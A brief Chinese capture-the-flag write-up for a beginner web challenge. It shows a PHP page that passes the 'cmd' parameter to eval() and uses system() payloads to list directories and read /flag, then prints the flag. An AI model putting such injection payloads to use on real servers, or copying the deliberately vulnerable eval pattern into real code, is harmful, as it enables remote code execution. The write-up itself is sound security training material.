青少年CTF-qsnctf-Web-eval

题目环境：

image.png

出题人：末心 题目难度：★ 题目描述：Eval是个什么呢，flag格式为：qsnctf{xxx}。

做道末心师傅出的题啦😉

image.png

<?php
highlight_file(__FILE__);
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
}
?>

• 给了一个参数cmd
• 这个参数cmd存在外部执行漏洞

补充： system是外部命令执行函数

列出此路径下的目录和文件 ?cmd=system("ls");

image.png

有回显结果！

列出根目录下的目录和文件 ?cmd=system("ls /");

image.png

发现了flag的存在！

查看flag的内容 ?cmd=system("cat /flag");

image.png

得到flag： qsnctf{4e90381c-e0b6-4608-a7c7-8cddc0f1b594}